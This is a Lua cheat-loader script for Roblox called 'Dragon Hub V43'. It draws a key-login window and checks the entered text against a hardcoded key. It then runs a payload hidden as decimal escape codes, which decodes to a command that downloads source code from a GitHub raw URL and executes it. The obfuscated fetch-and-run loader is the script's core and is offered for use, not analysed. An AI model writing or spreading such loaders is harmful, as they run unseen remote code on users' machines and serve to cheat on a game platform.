-- [[ DRAGON HUB V43 - PROTECTED BY YASSIN ]] -- [[ ANTI-EDIT & ANTI-LEAK SYSTEM ]] local _0xPayload = "\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\39\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\68\114\97\103\111\110\69\115\112\97\115\101\47\72\117\98\47\109\97\105\110\47\115\111\117\114\99\101\39\41\41\40\41" local function _0xDragonVerify(_0xIn) -- كود تفعيل ياسين مشفر داخل الذاكرة local _0xSecret = "\89\65\83\83\73\78\95\68\101\118\101\108\111\112\101\114\49" if _0xIn == _0xSecret then return true else return false end end local _0xUI = Instance.new("ScreenGui", game.CoreGui) local _0xM = Instance.new("Frame", _0xUI) _0xM.Size = UDim2.new(0, 320, 0, 160); _0xM.Position = UDim2.new(0.5, -160, 0.5, -80) _0xM.BackgroundColor3 = Color3.fromRGB(10, 10, 10); Instance.new("UICorner", _0xM) local _0xS = Instance.new("UIStroke", _0xM); _0xS.Thickness = 2; spawn(function() while task.wait() do _0xS.Color = Color3.fromHSV(tick()%5/5, 0.8, 1) end end) local _0xT = Instance.new("TextBox", _0xM) _0xT.Size = UDim2.new(0, 220, 0, 40); _0xT.Position = UDim2.new(0.5, -110, 0, 50) _0xT.PlaceholderText = "Check @golinovb for Key"; _0xT.BackgroundColor3 = Color3.fromRGB(30, 30, 30) _0xT.TextColor3 = Color3.new(1, 1, 1); Instance.new("UICorner", _0xT) local _0xB = Instance.new("TextButton", _0xM) _0xB.Size = UDim2.new(0, 120, 0, 40); _0xB.Position = UDim2.new(0.5, -60, 0, 100) _0xB.Text = "Login"; _0xB.BackgroundColor3 = Color3.fromRGB(0, 120, 0); _0xB.TextColor3 = Color3.new(1, 1, 1) Instance.new("UICorner", _0xB) _0xB.MouseButton1Click:Connect(function() if _0xDragonVerify(_0xT.Text) then _0xUI:Destroy() assert(loadstring(_0xPayload))() else _0xB.Text = "Wrong Key!"; task.wait(1); _0xB.Text = "Login" end end)